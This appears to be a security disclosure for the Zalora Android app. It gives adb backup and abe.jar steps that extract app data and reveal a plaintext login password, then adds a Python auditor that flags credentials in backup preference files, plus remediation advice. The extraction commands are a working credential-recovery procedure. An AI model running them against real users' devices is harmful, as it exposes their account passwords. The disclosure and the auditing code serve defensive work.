Zalora

Posted by a guest, Apr 21st, 2019
#Application: Zalora
#Platform: Android
#Version: 6.15.1 (latest)
#Severity: Medium
#Impact: A non-root user (anyone with adb access to the device) can read the password in clear text and log in to the application.

POC:

1. Back up the application data to the local PC:
adb backup -f ~/zalora.ab -noapk com.zalora.android

2. Convert the file "zalora.ab" into a tar file (it contains the backup data of com.zalora.android):
java -jar abe.jar unpack ~/zalora.ab zalora.tar ""

3. Extract the tar file:
tar -xvf zalora.tar

4. After extraction, inspect the data in the directory apps/com.zalora.android/

5. Look for sensitive data. The password is stored in plain text in /shared_prefs/login_data.xml:

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
</map>
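As an added audit check (example code written for this page, not from the disclosure or from Zalora), the following Python scans the preferences files in an unpacked backup and flags entries whose name or JSON payload carries a credential key, so a reviewer can fail a pre-release check before a build ships with this kind of storage. It assumes abe's apps/<pkg>/sp/*.xml layout and uses a constructed sample preferences file with placeholder values.

```python
import json
import tempfile
from pathlib import Path
from xml.etree import ElementTree as ET

# Keys that indicate a credential persisted in clear text (heuristic, assumed here).
CREDENTIAL_KEYS = {"password", "passwd", "pwd", "pin", "secret"}
# Constructed preferences file in the shape the disclosure shows; placeholder values.
SAMPLE_XML = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="login_data">{&quot;password&quot;:&quot;example-password&quot;,&quot;email&quot;:&quot;user@example.com&quot;}</string>
    <string name="session_token">opaque-token-placeholder</string>
</map>
"""

def _json_credential_keys(value):
    """Return credential-looking keys when `value` parses as a JSON object."""
    try:
        obj = json.loads(value)
    except (ValueError, TypeError):
        return set()
    return {k for k in obj if k.lower() in CREDENTIAL_KEYS} if isinstance(obj, dict) else set()

def scan_shared_prefs(xml_text, filename="shared_prefs.xml"):
    """Flag <string> entries whose name or JSON payload carries a credential.
    Returns a list of (filename, pref_name, sorted matched keys)."""
    findings = []
    root = ET.fromstring(xml_text)  # the XML parser unescapes &quot; for us
    for elem in root.iter("string"):
        name = elem.get("name", "")
        hits = {name} if name.lower() in CREDENTIAL_KEYS else set()
        hits |= _json_credential_keys(elem.text or "")
        if hits:
            findings.append((filename, name, sorted(hits)))
    return findings

def scan_backup_tree(root_dir):
    """Scan every preferences file in an unpacked backup (abe lays them out as apps/<pkg>/sp/*.xml)."""
    findings = []
    for path in sorted(Path(root_dir).glob("apps/*/sp/*.xml")):
        findings.extend(scan_shared_prefs(path.read_text(encoding="utf-8"), path.name))
    return findings

def demo():
    # Write the constructed sample into a temporary backup layout and scan it.
    with tempfile.TemporaryDirectory() as tmp:
        sp = Path(tmp, "apps", "com.example.app", "sp")
        sp.mkdir(parents=True)
        (sp / "login_data.xml").write_text(SAMPLE_XML, encoding="utf-8")
        return scan_backup_tree(tmp)
```

A non-empty result means a credential is written to app-private storage that adb backup can export; the fix is to keep only a revocable session token on the device and to disable backup of that data rather than to obfuscate the password.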